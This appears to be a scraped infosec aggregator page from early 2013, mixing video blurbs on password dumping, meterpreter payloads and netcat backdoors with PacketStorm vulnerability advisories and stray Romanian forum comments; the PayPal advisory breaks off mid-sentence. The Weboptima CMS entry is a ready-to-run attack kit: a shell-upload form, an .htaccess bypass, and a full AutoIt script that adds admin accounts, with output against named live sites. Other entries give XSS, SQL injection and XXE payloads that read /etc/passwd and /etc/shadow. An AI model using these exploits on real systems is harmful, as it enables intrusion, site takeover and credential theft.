Praetorian503

Description: In this video I will show you how to dump windows clear text password. Process is very simple and powerful just launch the exe using this command (wce.exe –w ) and you have the clear text password running user password. In this demo I’m using this wce as a post – exploitation password gathering. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Dump Clear Text Password Using Wce

Description: Can the government force you to turn over your encryption passphrase or decrypt your data? The law surrounding police attempts to force decryption is developing at breakneck speed, with two major court decisions this year alone. This talk will start off with an in-depth explanation of the Fifth Amendment privilege against self-incrimination, its origins, and how it applies to government attempts to force disclosure of keys or decrypted versions of data in the United States. We'll also discuss law enforcement authority to demand passphrases and decryption of data stored with third parties, and survey key disclosure laws in other countries. Marcia Hofmann is a senior staff attorney at the Electronic Frontier Foundation, where she works on a broad range of digital civil liberties issues including computer security, electronic privacy, and free expression. She currently focuses on computer crime and EFF's Coders' Rights Project, which promotes innovation and protects the rights of curious tinkerers and researchers in their cutting-edge exploration of technology. Prior to joining EFF, Marcia was staff counsel and director of the Open Government Project at the Electronic Privacy Information Center (EPIC). Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Crypto And The Cops: The Law Of Key Disclosure And Forced Decryption

The WordPress Chocolate theme suffers from cross site scripting, denial of service, path disclosure, abuse of functionality, and remote shell upload vulnerabilities. Hello list! I want to warn you about multiple vulnerabilities in Chocolate WP theme for WordPress. This is commercial theme for WP. These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities. In 2011 I wrote about Cross-Site Scripting (WASC-08), Full path disclosure (WASC-13), Abuse of Functionality (WASC-42) and Denial of Service (WASC-10) vulnerabilities in TimThumb and multiple themes for WordPress (http://websecurity.com.ua/4910/), and later also was disclosed Arbitrary File Uploading (WASC-31) vulnerability. In previous years I've wrote about multiple vulnerabilities in 145 WP themes (http://websecurity.com.ua/4915/) and here is another theme. ------------------------- Affected products: ------------------------- Vulnerable are all versions of Chocolate WP theme for WordPress. Earlier I've informed developers about these vulnerabilities. ---------- Details: ---------- XSS (WASC-08) (in older versions of TimThumb): http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3C111 http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1&w=1111111 http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1111111&w=1 Abuse of Functionality (WASC-42): http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site&h=1&w=1 http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) DoS (WASC-10): http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1 http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). Arbitrary File Upload (WASC-31): http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php Full path disclosure (WASC-13): http://site/wp-content/themes/dt-chocolate/ Besides index.php there are also potentially FPD in other php-files of this theme. Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua Source: PacketStorm

Weboptima CMS suffers from add administrator and remote shell upload vulnerabilities. #cs 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm AkaStep member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 weboptima_cms_remote_add_admin_shell_upload.au3 ============================================ Vulnerable Software: Weboptima CMS Vendor: http://weboptima.am/ Vulns: REMOTE SHELL UPLOAD AND REMOTE ARBITRARY ADD ADMIN. Both Exploits are available(HTML exploit to upload shell) And Autoit Exploit to add arbitrary admin accounts to target site. More detailts below. ============================================ Few DEMOS: http://navasards.am http://olivergroup.am http://iom.am http://bluefly.am http://invest-in-armenia.com http://decart.am http://armgeokart.am/ ============================================ About Vulns: 1'ST vulnerability is REMOTE SHELL UPLOAD: Any *UNAUTHENTICATED* USER CAN UPLOAD SHELL. Vulnerable code: //cms/upload.php =============SNIP BEGINS====================== <?php $path="../uploades"; if(!file_exists($path)) { mkdir($path, 0777); } if(isset($_GET['name'])) { unlink($path."/".$_GET['name']); $letter = $_GET['letter']; $selTypey = $_GET['selType']; header("Location: upload.php?letter=$letter&selType=$selTypey"); } ?> <?php include_once("start.php"); ?> <div align="center"> <table align="center"> <tr> <td colspan="3" align="center"><span class="title">????? ??????</span></td> </tr> <tr> <td> <?php if(isset($_POST['sub'])) { $fileName = $_FILES["up_file"]['name']; $masSimbl = array('&','%','#'); if(in_array($fileName[0], $masSimbl)) { echo $fileName[0].' ???????? ?????? ????? ???????'; } else { move_uploaded_file($_FILES["up_file"]['tmp_name'],"$path/".$_FILES["up_file"]['name']); } } ?> ========================SNIP ENDS================= Simple HTML exploit to upload your shell: <form method="post" action="http://CHANGE_TO_TARGET/cms/upload.php" enctype="multipart/form-data"> <input type="file" name="up_file" /> <input type="submit" class="button" name="sub" value="send"></form> After Successfully shell upload your shell can be found: http://site.tld/uploades/shellname.php NOTE: There may be simple .htaccess to prevent you from accessing shell(HTTP 403). This is not problem just upload your shell like: myshell.PhP or myshell.pHp OWNED. 2'nd vulnerability is: REMOTE ADD ADMIN Any *UNAUTHENTICATED* USER CAN ADD ARBITRARY ADMIN ACCOUNT(s) TO TARGET SITE. Vulnerable Code: //cms/loginPass.php Notice: header() without exit;*Script continues it's execution.* ==================SNIP BEGINS========= <?php session_start(); if($_SESSION['status_shoping_adm']!="adm_shop") { header("Location: index.php"); } require_once('../myClass/DatabaseManeger.php'); require_once("../myClass/function.php"); $_POST = stripSlash($_POST); $_GET = stripSlash($_GET); ?> <?php $error = ""; //And more stuff ==================SNIP ENDS============= And here is exploit written in Autoit to exploit this vulnerability and add admin to target site. Exploit usage(CLI): weboptima.exe http://decart.am AzerbaijanBlackHatzWasHere AzerbaijanBlackHatzWasHere ############################################################## Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) Usage: weboptima.exe http://site.tld username password [*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*] [@@@] Vuln & Exploit By AkaStep [@@@] ############################################################## [+] GETTING INFO ABOUT CMS [+] [*] GOT Response : Yes! It is exactly that we are looking for! [*] ################################################## Trying to add new admin: To Site:www.decart.am With Username: AzerbaijanBlackHatzWasHere With Password: AzerbaijanBlackHatzWasHere ################################################## ################################################## Exploit Try Count:1 ################################################## Error Count:0 ################################################## ################################################## Exploit Try Count:2 ################################################## Error Count:0 ################################################## Count of errors during exploitation : 0 ################################################## [*] Yaaaaa We are Going To Travel xD [*] Try to login @ Site: decart.am/cms/index.php With Username: AzerbaijanBlackHatzWasHere With Password: AzerbaijanBlackHatzWasHere *NOTE* Make Sure Your Browser Reveals HTTP REFERER! OTHERWISE YOU WILL UNABLE TO LOGIN! ################################################## [*] Exit [*] ################################################## #ce #NoTrayIcon #Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_UseUpx=n #AutoIt3Wrapper_Change2CUI=y #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #NoTrayIcon #include "WinHttp.au3" #include <inet.au3> #include <String.au3> $exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _ 'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _ 'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _ @CRLF & "[*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _ '[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62); ConsoleWrite(@CRLF & $exploitname & @CRLF) $method='POST'; $vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1); Global $count=0,$error=0; $cmsindent='kcaptcha'; # We will use it to identify CMS #; $adminpanel='/cms/index.php'; ;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~; $useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)'; $msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF if $CmdLine[0] <> 3 Then MsgBox(64,"",$msg_usage); ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); exit; EndIf if $CmdLine[0]=3 Then $targetsite=$CmdLine[1]; $username=$CmdLine[2]; $password=$CmdLine[3]; EndIf if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then ConsoleWrite('Are you kidding me?'); Exit; EndIf HttpSetUserAgent($useragent) $doublecheck=InetGet($targetsite,'',1); if @error Then ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF) Exit; EndIf ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF); sleep(Random(1200,2500,1)); HttpSetUserAgent($useragent); $sidentify=_INetGetSource($targetsite & $adminpanel,True); if StringInStr($sidentify,$cmsindent) Then ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF) Else ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF) $error+=1; EndIf $targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','') priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~# Func priv8($targetsite,$username,$password,$count,$error) $count+=1;~ #~ We are not going to exploit in infinitive manner xD #~; Global $sAddress = $targetsite $triptrop=@CRLF & _StringRepeat('#',50) & @CRLF; $whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _ $username & @CRLF & 'With Password: ' & $password & $triptrop; if $count <=1 then ConsoleWrite($whatcurrentlywedo) $doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop; ConsoleWrite($doitnicely); Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New"; if $error>=2 OR $count>=2 Then ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF) if int($error)=0 then ConsoleWrite($triptrop & '[*] Yaaaaa We are Going To Travel xD [*]' & _ @CRLF & 'Try to login @ ' & @CRLF & _ 'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _ $username & @CRLF & 'With Password: ' & $password & @CRLF & _ '*NOTE* Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _ ' OTHERWISE YOU WILL UNABLE TO LOGIN! ' & $triptrop & '[*] Exit [*]' & $triptrop); exit; Else ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _ '[*] Anyway,try to login with new credentials. [*]' & @CRLF & _ '[*] May be you are Lucky;) [*]' & _ @CRLF & 'Try to login @ ' & @CRLF & _ 'Site: ' & $targetsite & $adminpanel & @CRLF & _ 'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop); EndIf exit; EndIf Global $hOpen = _WinHttpOpen($useragent); Global $hConnect = _WinHttpConnect($hOpen, $sAddress) Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,''); _WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8") _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5") _WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate") _WinHttpAddRequestHeaders($hRequest, "DNT: 1") _WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #; _WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~; _WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive") _WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded") _WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData)); _WinHttpSendRequest($hRequest, -1, $sPostData) _WinHttpReceiveResponse($hRequest) Global $sHeader, $sReturned If _WinHttpQueryDataAvailable($hRequest) Then $sHeader = _WinHttpQueryHeaders($hRequest) Do $sReturned &= _WinHttpReadData($hRequest) Until @error _WinHttpCloseHandle($hRequest) _WinHttpCloseHandle($hConnect) _WinHttpCloseHandle($hOpen) $targetsite=StringMid($targetsite,5,StringLen($targetsite)) Sleep(Random(10000,20000,1)); priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~; Else $error+=1;#~ iNCREMENT ERROR(s) COUNT. CUZ SOMETHING WENT WRONG ~#; _WinHttpCloseHandle($hRequest) _WinHttpCloseHandle($hConnect) _WinHttpCloseHandle($hOpen) $targetsite=StringMid($targetsite,5,StringLen($targetsite)) Sleep(Random(10000,20000,1)); priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~# EndIf EndFunc;=> priv8(); #cs ================================================ KUDOSSSSSSS ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers Also special thanks to: ottoman38 & HERO_AZE ================================================ /AkaStep #ce Source: PacketStorm

Ai PM!

Nici mie nu imi merge parola. Cred ca nici tu nu l-ai dezarhivat )

Description: In this video I will show you how to execute your payload for meterpretere shell using shellcodeexec. Shellcodeexec is an exe and script that allows you to execute your payload and helping to exploit the target machine. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Execute Your Paypload Using Shellcodeexec

Description: In this video I will show you how to use netcat as a backdoor. First you need to exploit a windows system then upload netcat exe after uploading netcat set firewall rules and registry. Process is very simple but useful maintaining access. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Post - Exploitation - Persistent Netcap Backdoor

Arata-i putin respect. Prinde-l, da-i cateva bucati, daca nu are ce sa ii faca. Asa e cand ai relatii, esti tare

F5 BIG-IP versions 11.2.0 and below suffer from a remote SQL injection vulnerability. SEC Consult Vulnerability Lab Security Advisory < 20130122-1 > ======================================================================= title: SQL Injection product: F5 BIG-IP vulnerable version: <=11.2.0 fixed version: 11.2.0 HF3 11.2.1 HF3 CVE number: CVE-2012-3000 impact: Medium homepage: http://www.f5.com/ found: 2012-09-03 by: S. Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: --------------------------- "The BIG-IP product suite is a system of application delivery services that work together on the same best-in-class hardware platform or software virtual instance. From load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available." URL: http://www.f5.com/products/big-ip/ Vulnerability overview/description: ----------------------------------- A SQL injection vulnerability exists in a BIG-IP component. This enables an authenticated attacker to access the MySQL database with the rights of MySQL user "root" (= highest privileges). Furthermore an attacker can access files in the file system with the rights of the "mysql" OS user. Proof of concept: ----------------- The following exploit shows how files can be extracted from the file system: POST /sam/admin/reports/php/saveSettings.php HTTP/1.1 Host: bigip Cookie: BIGIPAuthCookie=*VALID_COOKIE* Content-Length: 119 { "id": 2, "defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) -- x" } Note: target fields are only VARCHAR(60) thus MID() is used for extracting data. A request to /sam/admin/reports/php/getSettings.php returns the data: HTTP/1.1 200 OK ... {success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]} Vulnerable / tested versions: ----------------------------- The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0. Successful exploitation was possible with Application Security (ASM) or Access Policy (APM) enabled. Vendor contact timeline: ------------------------ 2012-10-04: Sending advisory draft and proof of concept. 2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and 11.2.1 HF3. 2013-01-22: SEC Consult releases coordinated security advisory. Solution: --------- Update to 11.2.0 HF3 or 11.2.1 HF3. Workaround: ----------- No workaround available. Advisory URL: -------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF S. Viehböck / @2013 Source: PacketStorm

F5 BIG-IP versions 11.2.0 and below suffer from an XML external entity injection (XXE) vulnerability. SEC Consult Vulnerability Lab Security Advisory < 20130122-0 > ======================================================================= title: XML External Entity Injection (XXE) product: F5 BIG-IP vulnerable version: <=11.2.0 fixed version: 11.2.0 HF3 11.2.1 HF3 CVE number: CVE-2012-2997 impact: Medium homepage: http://www.f5.com/ found: 2012-09-03 by: S. Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: --------------------------- "The BIG-IP product suite is a system of application delivery services that work together on the same best-in-class hardware platform or software virtual instance. From load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available." URL: http://www.f5.com/products/big-ip/ Vulnerability overview/description: ----------------------------------- An XML External Entity Injection (XXE) vulnerability exists in a BIG-IP component. This enables an authenticated attacker to download arbitrary files from the file system with the rights of the "apache" OS user. The BIG-IP configuration even allows access to the critical /etc/shadow file which contains the password hashes of users. Proof of concept: ----------------- The following exploit shows how files can be extracted from the file system: POST /sam/admin/vpe2/public/php/server.php HTTP/1.1 Host: bigip Cookie: BIGIPAuthCookie=*VALID_COOKIE* Content-Length: 143 <?xml version="1.0" encoding='utf-8' ?> <!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]> <message><dialogueType>&e;</dialogueType></message> The response includes the content of the file: <?xml version="1.0" encoding="utf-8"?> <message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client has sent unknown dialogueType ' root:--hash--:15490:::::: bin:*:15490:::::: daemon:*:15490:::::: adm:*:15490:::::: lp:*:15490:::::: mail:*:15490:::::: uucp:*:15490:::::: operator:*:15490:::::: nobody:*:15490:::::: tmshnobody:*:15490:::::: admin:--hash--:15490:0:99999:7::: ... Vulnerable / tested versions: ----------------------------- The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0. No modules have to be enabled for successful exploitation. Vendor contact timeline: ------------------------ 2012-09-07: Contacting vendor - reqesting PGP/SMIME key. 2012-09-07: Vendor provides case number and PGP key. 2012-09-11: Sending advisory draft and proof of concept. 2012-09-20: Vendor has a fix for the vulnerability - will be released "with different hot fixes for different releases". 2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and 11.2.1 HF3. 2013-01-22: SEC Consult releases coordinated security advisory. Solution: --------- Update to 11.2.0 HF3 or 11.2.1 HF3. Patch information is also available at: http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html Workaround: ----------- No workaround available. Advisory URL: -------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF S. Viehböck / @2013 Source: PacketStorm

Perforce P4web 2011 / 2012 web client suffers from a cross site scripting vulnerability. *# Exploit Title: Perforce P4web 2011/2012 Web Client XSS Vulnerability # Date: 21 Jan 2013 # Researcher: Christy Philip Mathew # Email: christypriory@gmail.com # Vendor or Software Link: http://filehost.perforce.com/perforce/r11.1/bin.ntx86/p4webinst.exe http://www.perforce.com/downloads/perforce/r12.1/bin.ntx86/p4webinst.exe # Version: P4Web/2011.1 & P4Web/2012.1 # Category:: local* Perforce P4Web 2011.1 / 2012.1 has an XSS Vulnerability in its web client which can be actively exploited by attackers. *Perforce P4Web 2011 POC Video http://www.youtube.com/watch?v=NXrBBYODpPI *Perforce P4Web 2012 POC Video: *http://www.youtube.com/watch?v=69nRlTo4aT0 *Perforce P4web 2011 POC : Live HTTP Header POST Content* 1. Client Name XSS u=Administrator&p=&c=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Submit=Log+In&orgurl= 2. Client Filter cnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&cdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&cda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cho=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter 3. User XSS http://localhost:8080/@md=c&cd=//&cl=%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E&c=5q7@//?ac=81 4. User Filter XSS unm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&udu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&uda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter 5. Depot Tree XSS filter=147&fileFilter=matching&pattern=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&showClient=showClient&Filter=Filter 6. Path XSS goField=%2F%2F%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Go=Go 7. Branches Filter XSS bnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&bdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&bow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&bda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter 8. Labels XSS lnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&ldu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&low=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&lda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter 9. Job View XSS Filter=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=25&Show=Filter 10. Jobs Filter Filter=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=10&Jsf=Job&Jsf=Status&Jsf=User&Jsf=Date&Jsf=Description&Show=Filter 11. Change List Filter XSS UpToVal=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&User=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Max=50&PatVal=...+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Client=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&AllC=y&Show=Filter 12. UserAgent XSS ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Regard's *Christy Philip Mathew* Information Security Researcher Website:Offcon Info Security <http://www.offcon.org> Source: PacketStorm

Digitiliti DigiLIBE Management Console version 3.4 suffers from an execution after redirect vulnerability that discloses sensitive information. Product: DigiLIBE Management Console Vendor: Digitiliti Version: < 3.4 - ? Tested Version: 3.4 Vendor Notified Date: October 09, 2012 Release Date: January 18, 2013 Risk: High Authentication: None required Remote: Yes Description: Execution After Redirect vulnerabilities exist in DigiLIBE Management Console versions 3.4 and possibly other versions. This allows remote attackers to retrieve sensitive data that should only be returned to authenticated users. By not properly terminating the code after redirection an unauthenticated attacker can choose to not follow the redirect and view the normally protected content. Successful exploitation of this vulnerability resulted obtaining the contents of the 'General Configuration'. Exploit steps for proof-of-concept: 1. Using a proxy such as Burp Proxy intercept request: https://vulnerablehost.com/configuration/general_configuration.html 2. Send to repeater. 3. View response. Vendor Notified: Yes Vendor Response: November 11, 2012 - Deployed security update. Version not confirmed. Reference: CVE-2013-1402 http://cs.ucsb.edu/~bboe/public/pubs/fear-the-ear-ccs2011.pdf https://www.owasp.org/index.php/Execution_After_Redirect_(EAR) Credit: Robert Gilbert HALOCK Security Labs Source: PacketStorm

PayPal.com suffered from a remote blind SQL injection vulnerability. Title: ====== Paypal Bug Bounty #18 - Blind SQL Injection Vulnerability Date: ===== 2013-01-22 References: =========== http://www.vulnerability-lab.com/get_content.php?id=673 http://news.softpedia.com/news/PayPal-Addresses-Blind-SQL-Injection-Vulnerability-After-Being-Notified-by-Experts-323053.shtml VL-ID: ===== 673 Common Vulnerability Scoring System: ==================================== 8.3 Introduction: ============= PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract: ========= The Vulnerability Laboratory Research Team discovered a critical Web Vulnerability in the official Paypal ecommerce website application. Report-Timeline: ================ 2012-08-01: Researcher Notification & Coordination 2012-08-01: Vendor Notification 2012-08-07: Vendor Response/Feedback #1 2012-08-07: Vendor Response/Feedback #2 2012-12-04: Vendor Response/Feedback #3 2013-01-12: Vendor Fix/Patch 2013-01-22: Public Disclosure Status: ======== Published Affected Products: ================== PayPal Inc Product: Core Application 2012 Q4 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== A blind SQL Injection vulnerability is detected in the official Paypal ecommerce website application. The vulnerability allows remote attackers or local low privileged application user account to inject/execute (blind) own 